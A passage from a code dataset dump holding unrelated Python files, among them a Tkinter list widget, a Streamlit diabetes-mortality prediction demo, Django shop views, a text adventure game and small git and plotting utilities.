anchor=\"c\")\n self.canvas.tag_bind(self.prev_arrow_obj, '<Button-1>', self.prev_page)\n self.canvas.tag_bind(self.next_arrow_obj, '<Button-1>', self.next_page)\n\n def generate_colors(self):\n return [\"red2\", \"orange\", \"yellow2\", \"green2\", \"blue\", \"violet\"]\n\n def draw(self):\n y = self.y + self.top_pad\n middle = False\n start_i = self.pages[self.current_page][0]\n end_i = self.pages[self.current_page][1]\n middle_i = (self.current_page * self.on_one_page) + int(self.on_one_page/2)\n\n colors = self.generate_colors()\n for i in range(len(self.buttons)):\n if i >= start_i and i <= end_i and i < middle_i:\n # left column\n self.buttons[i].y = y\n self.buttons[i].change_color(colors.pop(0))\n self.buttons[i].draw()\n y += self.line_h\n\n elif i >= middle_i and i <= end_i:\n # right column\n if not middle:\n 
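# first item of the right-hand column: reset the y cursor and the colour palette\n 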
middle = True\n y = self.y + self.top_pad\n colors = self.generate_colors()\n self.buttons[i].y = y\n self.buttons[i].shifted = True\n self.buttons[i].change_color(colors.pop(0))\n self.buttons[i].draw()\n y += self.line_h\n\n def next_page(self, _):\n self.remove_current_page()\n self.current_page += 1\n if self.current_page > len(self.pages) - 1:\n self.current_page = 0\n self.draw()\n\n def prev_page(self, _):\n self.remove_current_page()\n self.current_page -= 1\n if self.current_page < 0:\n self.current_page = len(self.pages) - 1\n self.draw()\n\n def remove_current_page(self):\n start_i = self.pages[self.current_page][0]\n end_i = self.pages[self.current_page][1]\n for i in range(len(self.buttons)):\n if i >= start_i and i <= end_i:\n self.buttons[i].remove()\n\n\nclass ListButton:\n def __init__(self, x, y, w, h, text, canvas, fold_img_h, list):\n self.x = x\n self.y = y\n self.text = text\n self.canvas = canvas\n self.folder_img_h = fold_img_h\n self.width = w\n self.height = h\n self.is_selected = False\n self.list = list\n self.outline_id = 0\n self.shifted = False\n self.alt_x = self.x + self.width + 58 + 30\n self.color = \"green3\"\n self.selected = False\n self.text_color = 'white' if self.color in ('violet', 'red', 'blue', 'green3', 'green4') else '#0a333f'\n self.load_images()\n\n def get_upper_corner(self):\n return self.x - self.width / 2, self.y - self.height / 2\n\n def get_lower_corner(self):\n return self.x + self.width / 2, self.y + self.height / 2\n\n def remove(self):\n self.canvas.delete(self.textObj)\n self.canvas.delete(self.imageObj)\n self.canvas.delete(self.outline_id)\n self.canvas.delete(self.folderObj)\n self.canvas.delete(self.hoveredObj)\n\n def click(self, _):\n self.list.parent.solve_screen_keyboard.show()\n self.list.remove()\n self.list.parent.draw_task_assignment(self.text)\n\n def choose_text_color(self):\n if self.color in ('violet', 'red', 'blue', 'green3', 'green4', \"red2\"):\n self.text_color = \"white\"\n else:\n self.text_color = '#0a333f'\n\n def change_color(self, color):\n self.color = color\n self.choose_text_color()\n self.load_images()\n\n def load_images(self):\n img = Image.open('obrazky/buttons/{}.png'.format(self.color))\n img = img.resize((self.width, self.height), Image.ANTIALIAS)\n img3 = Image.open('obrazky/buttons/green.png')\n img3 = img3.resize((self.width, self.height), Image.ANTIALIAS)\n img2 = Image.open('obrazky/folder_icon.png')\n img2 = img2.resize((self.height + 10, self.height), Image.ANTIALIAS)\n\n self.image = ImageTk.PhotoImage(img)\n self.folder_img = ImageTk.PhotoImage(img2)\n self.hovered_img = ImageTk.PhotoImage(img3)\n\n def enter(self, _):\n self.list.deselect_all()\n self.canvas.itemconfigure(self.imageObj, state=\"hidden\")\n self.canvas.itemconfigure(self.hoveredObj, state='normal')\n self.canvas.itemconfigure(self.textObj, fill='#0a333f')\n self.selected = True\n\n def leave(self, _):\n self.selected = False\n self.canvas.itemconfigure(self.hoveredObj, state='hidden')\n self.canvas.itemconfigure(self.imageObj, state=\"normal\")\n self.canvas.itemconfigure(self.textObj, fill=self.text_color)\n\n def draw(self):\n fih = self.folder_img_h\n x = self.x\n if self.shifted:\n x = self.alt_x\n\n self.hoveredObj = self.canvas.create_image(x, self.y, image=self.hovered_img, anchor=\"c\")\n self.imageObj = self.canvas.create_image(x, self.y, image=self.image, anchor=\"c\")\n self.folderObj = self.canvas.create_image(x - self.width / 2.2- fih, self.y, image=self.folder_img,\n anchor=\"c\")\n self.textObj = 
self.canvas.create_text(x, self.y, font=(\"Comic Sans MS\", 15), fill=self.text_color, text=self.text.replace(\"_\",\" \"),\n anchor=\"c\")\n\n self.canvas.tag_bind(self.folderObj, '<Button-1>', self.click)\n self.canvas.tag_bind(self.hoveredObj, '<Button-1>', self.click)\n self.canvas.tag_bind(self.textObj, '<Button-1>', self.click)\n\n self.canvas.tag_bind(self.imageObj, '<Enter>', self.enter)\n self.canvas.tag_bind(self.textObj, '<Enter>', self.enter)\n self.canvas.tag_bind(self.hoveredObj, '<Leave>', self.leave)\n self.canvas.tag_bind(self.textObj, '<Leave>', self.leave)\n","repo_name":"Kothy/Collector","sub_path":"ClickableList.py","file_name":"ClickableList.py","file_ext":"py","file_size_in_byte":8333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} {"seq_id":"73747130473","text":"# streamlit test, version1\n\nimport pandas as pd\nimport numpy as np\nfrom pickle import load\nimport streamlit as st\nfrom PIL import Image\nimport numpy as np\nimport pandas as pd\nfrom xgboost import XGBClassifier\nfrom matplotlib import pyplot as plt\nfrom numpy import sqrt\nfrom numpy import argmax\nimport joblib\n\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.metrics import roc_curve\nfrom sklearn.metrics import classification_report\nfrom sklearn.metrics import roc_auc_score\nimport sklearn.metrics as metrics\nfrom sklearn.metrics import plot_roc_curve\nfrom sklearn.calibration import CalibratedClassifierCV\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.utils import resample\nfrom pickle import load\nimport shap\n\n# loading in the model to predict on the data\n## xgb models\nscaler, model, expl = joblib.load('sme.pkl')\n\n## im non\nim_sur = Image.open('alive.jpg')\n## im pro\nim_die = Image.open('die.jpg')\n\n# custom def : shap\ndef shap(\n sample_case,\n scaler = scaler,\n explainer = expl\n):\n # standardization columns\n std_cols=['age','duration','hptd'] \n # feature extraction from input data UA \n sample_case_features = sample_case.loc[:,['duration', 'vac_janssen', 'Metformin', 'Pioglitazone', 'hptd', 'hptv', 'Sitagliptin', 'male', 'age', 'recoverd_N']]\n sample_case_features[std_cols] = scaler.transform(sample_case_features[std_cols])\n expl_test = explainer.shap_values(sample_case_features.iloc[0])\n shap_bar = pd.DataFrame(\n {'shap_value(probability)' : expl_test}, index = ['duration', 'vac_janssen', 'Metformin', 'Pioglitazone', 'hptd', 'hptv', 'Sitagliptin', 'male', 'age', 'recoverd_N'])\n # clrs = ['blue' if x < 0 else 'red' for x in shap_var['shap']]\n return shap_bar\n\n# custom def : standardization and prediction\ndef model_prediction(\n sample_case,\n scaler = scaler, \n model = model\n):\n \"\"\"\n 'recoverd_N'\n 'age'\n 'male'\n 'duration'\n 'vac_janssen'\n 'hptv'\n 'Metformin'\n 'hptd'\n 'Pioglitazone'\n 'Sitagliptin'\n \"\"\"\n \n # standardization columns\n std_cols=['age','duration','hptd'] \n # feature extraction from input data UA \n sample_case_features = sample_case.loc[:,['duration', 'vac_janssen', 'Metformin', 'Pioglitazone', 'hptd', 'hptv', 'Sitagliptin', 'male', 'age', 'recoverd_N']]\n sample_case_features[std_cols] = scaler.transform(sample_case_features[std_cols])\n \n # predict probability by model\n prob = model.predict_proba(sample_case_features)[:,1]\n \n return prob\n\ndef data_mapping(df):\n \"\"\"this function preprocesses the user input\n return type: pandas dataframe\n \"\"\"\n df.male = df.male.map({'female':0, 'male':1})\n df.recoverd_N = df.recoverd_N.map({'Yes':0, 'No':1})\n df.vac_janssen = df.vac_janssen.map({'No':0, 
'Yes':1})\n df.hptv = df.hptv.map({'No':0, 'Yes':1})\n df.Metformin = df.Metformin.map({'No':0, 'Yes':1})\n df.Pioglitazone = df.Pioglitazone.map({'No':0, 'Yes':1})\n df.Sitagliptin = df.Sitagliptin.map({'No':0, 'Yes':1})\n\n #df.he_ubld = df.he_ubld.map({\"-\":0, \"+/-\":1, \"1+\":2, \"2+\":3, \"3+\":4, \"4+\":5})\n #df.he_upro = df.he_upro.map({\"-\":0, \"+/-\":1, \"1+\":2, \"2+\":3, \"3+\":4, \"4+\":5})\n #df.he_uglu = df.he_uglu.map({\"-\":0, \"+/-\":1, \"1+\":2, \"2+\":3, \"3+\":4, \"4+\":5})\n return df\n\ndef main():\n # giving the webpage a title\n st.title(\"Will you be alive?\")\n \n # here we define some of the front end elements of the web page like \n # the font and background color, the padding and the text to be displayed\n html_temp = \"\"\"\n
    \n
    <div style=\"background-color:tomato;padding:13px\"> \n
    <h1 style=\"color:white;text-align:center;\">Prediction Death in diabetes ML App</h1> \n
    </div> \n
    \n \"\"\"\n \n # this line allows us to display the front end aspects we have \n # defined in the above code\n st.markdown(html_temp, unsafe_allow_html = True)\n \n # the following lines create text boxes in which the user can enter \n # the data required to make the prediction\n\n age = st.sidebar.slider(\"age\", 0, 100, 1)\n male = st.sidebar.selectbox(\"sex\", (\"female\", \"male\"))\n vac_janssen = st.sidebar.selectbox(\"Have you vaccinated Janssen?\", (\"Yes\", \"No\"))\n recoverd_N = st.sidebar.selectbox(\"have you recovered?\", (\"Yes\", \"No\"))\n duration = st.sidebar.slider(\"How long have you been vaccinated?\", 0, 365, 1)\n hptv = st.sidebar.selectbox(\"Have you ever been to a hospital?\", (\"Yes\", \"No\"))\n hptd = st.sidebar.slider(\"How long have you been in the hospital? (day)\", 0, 110, 1)\n Metformin = st.sidebar.selectbox(\"Do you take metformin?\", (\"Yes\", \"No\"))\n Pioglitazone = st.sidebar.selectbox(\"Do you take Pioglitazone?\", (\"Yes\", \"No\"))\n Sitagliptin = st.sidebar.selectbox(\"Do you take Sitagliptin?\", (\"Yes\", \"No\"))\n \n features = {\n \"duration\" : duration,\n \"vac_janssen\" : vac_janssen,\n \"Metformin\" : Metformin,\n \"Pioglitazone\": Pioglitazone,\n \"hptd\" : hptd,\n \"hptv\" : hptv,\n \"Sitagliptin\" : Sitagliptin,\n \"male\" : male,\n \"age\" : age,\n \"recoverd_N\" : recoverd_N\n }\n sample_case = pd.DataFrame(features, index=[0])\n \n result = \"\"\n prob = 0.0\n # the below line ensures that when the button called 'Predict' is clicked, \n # the prediction function defined above is called to make the prediction \n # and store it in the variable result\n if st.button(\"Predict\"):\n sample_case_map = data_mapping(sample_case)\n result = model_prediction(sample_case_map)\n prob = result\n shap_bar = shap(sample_case_map)\n\n st.success('probability : {}'.format(result))\n \n if float(prob) < 0.432 :\n st.success(\"threshold : 0.432\")\n st.image(im_sur)\n st.bar_chart(data=shap_bar)\n else :\n st.success(\"threshold : 0.432\")\n st.image(im_die)\n st.bar_chart(data=shap_bar)\n \nif __name__=='__main__':\n main()\n","repo_name":"eunchanj/streamlit_adr_death","sub_path":"streamlit.py","file_name":"streamlit.py","file_ext":"py","file_size_in_byte":6009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28269914001","text":"\"\"\"added userinfo, find definition statistic\n\nRevision ID: 165feca318ad\nRevises: 122feefadc11\nCreate Date: 2023-08-02 08:31:08.481258\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '165feca318ad'\ndown_revision = '122feefadc11'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.alter_column('user_info', 'language',\n existing_type=sa.VARCHAR(),\n nullable=True)\n # ### end Alembic commands ###\n\n\ndef downgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! 
###\n op.alter_column('user_info', 'language',\n existing_type=sa.VARCHAR(),\n nullable=False)\n # ### end Alembic commands ###\n","repo_name":"AlertRED/telegram-language-bot","sub_path":"database/migration/versions/165feca318ad.py","file_name":"165feca318ad.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} {"seq_id":"146598836","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\n# Problem: read characters from the keyboard and write them to a disk file one by one, until a # is entered.\n\nfp = open('test.txt','a+') # a+ means append plus read/write\n\nwhile True:\n\ts = input('Please enter a character: ')\n\tif s != '#':\n\t\tfp.write(s)\n\n\telse:\n\t\tbreak\n\nfp.seek(0)\nprint(fp.read())\n\nall_the_text = open('test.txt').read()\nprint(all_the_text)\n\nfp.close()\n\n\n\n\n\n\n\n\n\n","repo_name":"chenyanqa/example_tests_one","sub_path":"test_97.py","file_name":"test_97.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} {"seq_id":"913178894","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function, division\n\nimport ROOT, os, sys, argparse, stealthEnv, subprocess\ninputArgumentsParser = argparse.ArgumentParser(description='Extract HLT efficiency histograms and save them to an output image.')\ninputArgumentsParser.add_argument('--outputFolder', default=\"/uscms/home/tmudholk/nobackup/analysisAreas/PUWeights\", help='Path to folder in which to store output files.',type=str)\ninputArguments = inputArgumentsParser.parse_args()\n\nROOT.gROOT.SetBatch(ROOT.kTRUE)\nif not(os.path.isdir(inputArguments.outputFolder)): subprocess.check_call(\"mkdir -p {oF}\".format(oF=inputArguments.outputFolder), shell=True, executable=\"/bin/bash\")\n\nsourceFolder_MC = \"{eP}/{sER}/analysisEOSAreas/analysis/\".format(eP=stealthEnv.EOSPrefix, sER=stealthEnv.stealthEOSRoot)\nsourceFolder_data = \"{sR}/getPUWeights/data/\".format(sR=stealthEnv.stealthRoot)\n\n# targets = {\n# \"signal\": \"hltEfficiency1D_leadingPhoton_signal\",\n# \"signal_loose\": \"hltEfficiency1D_leadingPhoton_signal_loose\",\n# \"control\": \"hltEfficiency1D_leadingPhoton_control_fakefake\"\n# }\n\n# for selection, efficiencyName in targets.items():\n# print(\"Extracting selection: {s}, efficiencyName: {eN}\".format(s=selection, eN=efficiencyName))\n# for year, sourceTypePathDict in sources.items():\n# print(\"Fetching efficiencies for year: {y}\".format(y=year))\n# # outputFile = ROOT.TFile.Open(inputArguments.outputFolder + \"/\" + inputArguments.outputPrefix + \"_\" + selection + \".root\", \"RECREATE\")\n# outputFileName = \"{oF}/{oP}_{s}_{y}.root\".format(oF=inputArguments.outputFolder, oP=inputArguments.outputPrefix, s=selection, y=year)\n# outputFile = ROOT.TFile.Open(outputFileName, \"RECREATE\")\n# if ((outputFile.IsZombie() == ROOT.kTRUE) or not(outputFile.IsOpen() == ROOT.kTRUE)): sys.exit(\"ERROR: Unable to open file \\\"{oFN}\\\"\".format(oFN=outputFileName))\n# for sourceType, path in sourceTypePathDict.items():\n# print(\"Fetching efficiency of type: \\\"{sT}\\\" from path: {p}\".format(sT=sourceType, p=path))\n# inputFile = ROOT.TFile.Open(path, \"READ\")\n# if ((inputFile.IsZombie() == ROOT.kTRUE) or not(inputFile.IsOpen() == ROOT.kTRUE)): sys.exit(\"ERROR: Unable to open file at path \\\"{p}\\\"\".format(p=path))\n# efficiencyToFetch = ROOT.TEfficiency()\n# efficiency_label = (efficiencyName.replace(\"hltEfficiency1D_leadingPhoton_\", \"\")).replace(\"_\" + selection, \"\") + \"_\" + sourceType\n# 
efficiencyToFetch.SetName(efficiency_label)\n# inputFile.GetObject(efficiencyName, efficiencyToFetch)\n# efficiencyToFetch.SetName(\"hltEfficiency_{s}\".format(s=sourceType))\n# c = ROOT.TCanvas(\"output_\" + efficiency_label + \"_\" + efficiencyName + \"_\" + str(year), \"output_\" + efficiency_label + \"_\" + efficiencyName + \"_\" + str(year), 1024, 768)\n# efficiencyToFetch.Draw()\n# c.SaveAs(\"{oF}/{oP}_{l}_{y}.pdf\".format(oF=inputArguments.outputFolder, oP=inputArguments.outputPrefix, l=efficiency_label, y=year))\n# outputFile.WriteTObject(efficiencyToFetch)\n# inputFile.Close()\n# outputFile.Close()\n\nselection_names = {\n \"signal\": \"signal\",\n \"signal_loose\": \"loose signal\",\n \"control\": \"diphoton control\"\n}\n\nfor year in [\"2016\", \"2017\", \"2018\"]:\n # First data histograms\n source_file_path = \"{sF}/dataPU_{y}.root\".format(sF=sourceFolder_data, y=year)\n inputFileObject = ROOT.TFile.Open(source_file_path, \"READ\")\n if ((inputFileObject.IsZombie() == ROOT.kTRUE) or not(inputFileObject.IsOpen() == ROOT.kTRUE)):\n sys.exit(\"ERROR: Unable to open file {f}\".format(f=source_file_path))\n puDataHistogram = ROOT.TH1D()\n inputFileObject.GetObject(\"pileup\", puDataHistogram)\n puDataHistogram.GetXaxis().SetTitle(\"PU\")\n puDataHistogram.GetYaxis().SetTitle(\"Events/100\")\n puDataHistogram.SetTitle((\"Pileup distribution, data, {y}\").format(y=year))\n outputObjectName = \"pileup_data_{y}\".format(y=year)\n c = ROOT.TCanvas(\"output_\" + outputObjectName, \"output_\" + outputObjectName, 1024, 768)\n puDataHistogram.Draw()\n c.SaveAs(\"{oF}/{n}.pdf\".format(oF=inputArguments.outputFolder, n=outputObjectName))\n inputFileObject.Close()\n # Next \n for production_type in [\"gluino\", \"squark\"]:\n for signal_selection in [\"signal\", \"signal_loose\"]:\n source_file_path = \"{sF}/PUWeights_{y}_{p}_{s}.root\".format(sF=sourceFolder_MC, y=year, p=production_type, s=signal_selection)\n print(\"Extracting plots from file: {s_f_p}\".format(s_f_p=source_file_path))\n inputFileObject = ROOT.TFile.Open(source_file_path, \"READ\")\n if ((inputFileObject.IsZombie() == ROOT.kTRUE) or not(inputFileObject.IsOpen() == ROOT.kTRUE)):\n sys.exit(\"ERROR: Unable to open file {f}\".format(f=source_file_path))\n puWeightsHistogram = ROOT.TH1D()\n inputFileObject.GetObject(\"pileupWeights\", puWeightsHistogram)\n puWeightsHistogram.GetXaxis().SetTitle(\"PU\")\n puWeightsHistogram.GetYaxis().SetTitle(\"weight\")\n puWeightsHistogram.SetTitle((\"PU weights, {y}, {n} selection, di{p} production\").format(y=year, n=selection_names[signal_selection], p=production_type))\n outputObjectName = \"pileup_weights_vs_pu_{y}_{p}_{s}\".format(y=year, p=production_type, s=signal_selection)\n c = ROOT.TCanvas(\"output_\" + outputObjectName, \"output_\" + outputObjectName, 1024, 768)\n puWeightsHistogram.Draw()\n c.SaveAs(\"{oF}/{n}.pdf\".format(oF=inputArguments.outputFolder, n=outputObjectName))\n inputFileObject.Close()\n\nprint(\"All done!\")\n","repo_name":"tanmaymudholkar/STEALTH","sub_path":"miscUtils/extractPUWeights.py","file_name":"extractPUWeights.py","file_ext":"py","file_size_in_byte":5691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"12134747929","text":"t = int(input())\r\n\r\n\r\n# input(),input()\r\ndef code():\r\n n = int(input())\r\n st = [int(i) for i in input().split()]\r\n tups = list(zip(st[1::3], st[2::3]))\r\n tups = sorted(tups, key=lambda x: x[1], reverse=True)\r\n # print(tups)\r\n\r\n prof = 0\r\n jobs = 0\r\n emp = 
[1] * n\r\n for tup in tups:\r\n f = tup[0] - 1\r\n try:\r\n emp[f]\r\n except:\r\n f = n - 1\r\n while f != -1:\r\n if emp[f] == 1:\r\n prof += tup[1]\r\n jobs += 1\r\n emp[f] = 0\r\n break\r\n else:\r\n f -= 1\r\n print(str(jobs) + ' ' + str(prof))\r\n\r\n\r\nfor i in range(t):\r\n code()\r\n\r\n\r\n","repo_name":"ByKyle/practice","sub_path":"src/main/java/cn/yk/practice/alg/3183.py","file_name":"3183.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71028058792","text":"from django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.shortcuts import render, redirect, reverse\nfrom django.views import View\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.views.generic import DeleteView, CreateView\n\nfrom .models import Product, Type, Cart, User, Wishlist\nfrom .settings.base import INFO\n\n# Create your views here.\n\n\nclass IndexView(View):\n\n def get(self, request):\n\n context = {'products': Product.objects.all()[:8]}\n context.update(INFO)\n return render(request, 'shop/index.html', context)\n\n\nclass ShopView(View):\n def get(self, request, prod_type=None):\n page = self.request.GET.get('page')\n\n if not prod_type:\n products_list = Product.objects.all()\n else:\n products_list = Product.objects.filter(type__type=prod_type)\n type_list = Type.objects.all()\n\n product_on_page = 4\n paginator = Paginator(products_list, product_on_page)\n\n try:\n products_list = paginator.page(page)\n products_list.page_tuple = tuple(paginator.page_range)\n except PageNotAnInteger:\n products_list = paginator.page(1)\n except EmptyPage:\n return redirect(reverse('shop'))\n\n context = {\n 'page_obj': products_list,\n 'type_list': type_list,\n 'prod_type': prod_type,\n # 'paginator': paginator\n }\n context.update(INFO)\n return render(request, 'shop/shop.html', context)\n\n\nclass AboutView(View):\n\n def get(self, request):\n context = INFO\n return render(request, 'shop/about.html', context)\n\n\nclass ContactView(View):\n\n def get(self, request):\n context = INFO\n return render(request, 'shop/contact.html', context)\n\n\nclass WishlistView(LoginRequiredMixin, View):\n\n def get(self, request):\n context = {\n 'products': Wishlist.objects.filter(user_id__auth_user__username=request.user)\n }\n context.update(INFO)\n return render(request, 'shop/wishlist.html', context)\n\n\nclass WishlistViewDelete(LoginRequiredMixin, DeleteView):\n\n def get(self, request):\n product = request.GET.get('product')\n\n product_to_delete = Wishlist.objects.get(user_id__auth_user__username=request.user, product=product)\n product_to_delete.delete()\n cart_list = Wishlist.objects.filter(user_id__auth_user__username=request.user)\n context = {\n 'cart_list': cart_list,\n }\n context.update(INFO)\n return redirect(request.META.get('HTTP_REFERER', '/'))\n\n\nclass ProductView(View):\n\n def get(self, request):\n product = request.GET.get('product')\n product_to_show = Product.objects.get(name=product)\n\n context = {'products': Product.objects.all()[:4],\n 'product_to_show': product_to_show}\n context.update(INFO)\n return render(request, 'shop/product-single.html', context)\n\n\nclass CartView(LoginRequiredMixin, View):\n\n def get(self, request):\n\n cart_list = Cart.objects.filter(user_id__auth_user__username=request.user)\n\n context = {\n 'cart_list': cart_list,\n }\n context.update(INFO)\n return render(request, 'shop/cart.html', context)\n\n\nclass 
CartViewDelete(LoginRequiredMixin, DeleteView):\n\n def get(self, request):\n product = request.GET.get('product')\n\n product_to_delete = Cart.objects.get(user_id__auth_user__username=request.user, product=product)\n product_to_delete.delete()\n cart_list = Cart.objects.filter(user_id__auth_user__username=request.user)\n context = {\n 'cart_list': cart_list,\n }\n context.update(INFO)\n return redirect(request.META.get('HTTP_REFERER', '/'))\n\n\nclass ShopAddCartView(LoginRequiredMixin, CreateView):\n\n def get(self, request):\n product = request.GET.get('product')\n current_product = Product.objects.get(name=product)\n if product in [i.product.name for i in Cart.objects.filter(user_id__auth_user__username=request.user)]:\n current_product = Cart.objects.get(user_id__auth_user__username=request.user, product=current_product)\n current_product.count += 1\n current_product.save()\n else:\n current_user = User.objects.get(auth_user=request.user)\n Cart.objects.create(user_id=current_user, product=current_product, count=1)\n return redirect(request.META.get('HTTP_REFERER', '/'))\n\n\nclass ShopAddWishlistView(LoginRequiredMixin, CreateView):\n\n def get(self, request):\n product = request.GET.get('product')\n current_product = Product.objects.get(name=product)\n if product in [i.product.name for i in Wishlist.objects.filter(user_id__auth_user__username=request.user)]:\n current_product = Wishlist.objects.get(user_id__auth_user__username=request.user, product=current_product)\n current_product.count += 1\n current_product.save()\n else:\n current_user = User.objects.get(auth_user=request.user)\n Wishlist.objects.create(user_id=current_user, product=current_product, count=1)\n return redirect(request.META.get('HTTP_REFERER', '/'))\n\n\nclass CheckoutView(View):\n\n def get(self, request):\n context = INFO\n return render(request, 'shop/checkout.html', context)\n\n","repo_name":"chernovk/clean_web_proj","sub_path":"shop/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16447673352","text":"#import classes\nfrom room import Room\nfrom rpginfo import RPGInfo\nfrom item import Item\nfrom character import Friend\nfrom character import Enemy\n#create object haunted mansion\nhaunted_mansion = RPGInfo(\"____The Haunted Mansion____\")\n#call instance method welcome()\nhaunted_mansion.welcome()\nhaunted_mansion.instruction()\n#call static game generator message \nRPGInfo.info()\n#call room to make new rooms\nkitchen = Room(\"Kitchen\")\nballroom = Room(\"Ballroom\")\ndining_hall = Room(\"Dining Hall\")\ndungeon = Room(\"Dungeon\")\n#describe the rooms\nkitchen.set_description(\"A dank and dirty place, buzzing with flies\")\nballroom.set_description(\"A vast room with a shiny wooden floor; huge candlesticks gaurd the door\")\ndining_hall.set_description(\"A large room with ornate golden decorations on each wall\")\ndungeon.set_description(\"A large echoing dark windowless space\")\n#link the rooms\nkitchen.link_room(dining_hall,\"south\")\nballroom.link_room(dining_hall,\"east\")\ndining_hall.link_room(kitchen,\"north\")\ndining_hall.link_room(ballroom,\"west\")\ndining_hall.link_room(dungeon,\"east\")\ndungeon.link_room(dining_hall,\"west\")\n#define some unfriendly characters to fight\ndave = Enemy(\"Dave\",\"A smelly Zombie!\")\ndining_hall.set_character(dave)\ndave.set_conversation(\"Aaaa.....gh, 
br.......ains\")\ndave.set_weakness(\"spell\")\ndave.set_defeats(0)\n\ndragon = Enemy(\"A fire breathing dragon\", \"Sleeping soundly\")\ndungeon.set_character(dragon)\ndragon.set_conversation(\"Zzzzzzz\")\ndragon.set_weakness(\"sword\")\ndragon.set_defeats(0)\n#define some friendly characters to assist you\nanna = Friend(\"Anna\",\"A freindly ghost who once was a nurse\")\nballroom.set_character(anna)\nanna.set_conversation(\"You look poorly, can I assist?\")\n#define some items and where to find them\nsword = Item(\"sword\")\nsword.set_description(\"A rusty, blunt old cutlass\")\nsword.set_colour(\"sky blue purple\") \nkitchen.set_item(sword)\n\nspell = Item(\"spell\")\nspell.set_description(\"An old well thumbed book of spells\")\nspell.set_colour(\"Silver\") \ndining_hall.set_item(spell)\n\ncandelstick = Item(\"candlestick\")\ncandelstick.set_description(\"It has three candles in it\")\ncandelstick.set_colour(\"Golden\") \nballroom.set_item(candelstick)\n\ngold = Item(\"gold\")\ngold.set_description(\"A dragons hoard of golden coins\")\ngold.set_colour(\"deepest gold\")\ndungeon.set_item(gold)\n\n#set variables for player's health, location, wins and backpack contents\nhealth = 5\nwins = 0\ncurrent_room = kitchen\nbackpack = [ ]\n#set flag to allow exit from main program loop\nflag = True\n\n#main program loop\nwhile flag == True:\n #keep an eye on your health\n print(\"\\n\")\n print(\"your health is \",health)\n current_room.get_details()\n inhabitant = current_room.get_character()\n item = current_room.get_item()\n wins = dave.get_defeats() + dragon.get_defeats()\n #check if you have won\n if wins >1:\n print(\"You have defeated \",wins,\" opponents.\")\n print(\"**** Congratulations You Win the game ****\\n\\n\")\n break\n #check who and what is in room\n if inhabitant is not None:\n inhabitant.describe()\n if item is not None:\n item.describe()\n #get player input\n command=input(\">\")\n if command in [\"north\",\"south\",\"east\",\"west\"]:\n current_room = current_room.move(command)\n elif command == \"talk\":\n inhabitant.talk()\n elif command == \"fight\":\n health = health - 2\n print(\"What will you fight with?\")\n weapon = input()\n #check weapon in backpack\n if weapon in backpack:\n flag = inhabitant.fight(weapon)\n if weapon not in backpack:\n print(\"Ooops that's not in your backpack\\n\" + inhabitant.name + \" attacks you\")\n health = 0\n if health <= 0:\n print(\"Your health has now fallen too low so.....\")\n break\n #replenish health\n elif command==\"heal\":\n health=inhabitant.healing(health)\n #pick up object and place in backpack\n elif command==\"take\":\n backpack.append(item.get_name())\n print(\"your backpack contains \", backpack )\n current_room.set_item(None)\n \n#check if exited main loop because won if not you lost\nif wins < 2:\n print(\"You died.........\\n***********************\\n\" ) \n#print credits \nRPGInfo.author = \"Raspberry Pi Foundation\"\nRPGInfo.credits()\n","repo_name":"jons1s/haunted_mansion","sub_path":"Haunted_Mansion.py","file_name":"Haunted_Mansion.py","file_ext":"py","file_size_in_byte":4299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73976409192","text":"from subprocess import check_output, CalledProcessError\n\n\ndef handleGitCommit(m):\n try:\n check_output(\"git add .\", shell=True)\n s = check_output(f\"git commit -m \\\"{m}\\\"\", shell=True).decode()\n return f\"[green]Successfully Committed:[/green] {s}\"\n except CalledProcessError as e:\n return 
f\"[red]Error: {e.output.decode()}[/]\"\n\n\ndef handleGitPull():\n try:\n s = check_output(\"git pull origin main\", shell=True).decode()\n return f\"[green]Pulled From Remote Repo:[/green] {s}\"\n except CalledProcessError as e:\n return f\"[red]Error: {e.output.decode()}[/]\"\n\n\ndef handleGitPush():\n try:\n s = check_output(\"git push origin main\", shell=True).decode()\n return f\"[green]Pushed To Remote Repo,[/green] {s}\"\n except CalledProcessError as e:\n return f\"[red]Error: {e.output.decode()}[/]\"\n","repo_name":"dev-SR/thesis-v1","sub_path":"utils/git.py","file_name":"git.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"31616018451","text":"from django.urls import path\nfrom .views import *\n\nurlpatterns = [\n # path('', rooms, name='rooms'),\n path('/', index, name='index'),\n path('login/', Login, name='login'),\n path('logout/', Logout, name='logout'),\n path('signup/', Signup, name='signup'),\n path('profile/', Profile_Details, name='profile'),\n path('create-room/', create_rooms, name='create-room'),\n path('room/', roomDetails, name='room'),\n path('update-room/', updateRoom, name='update-room'),\n path('rooms/', roomss, name='roomss')\n]","repo_name":"NoV-ds/Conferencing","sub_path":"WEBRTC/webrtc/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28410439506","text":"class Solution(object):\n def 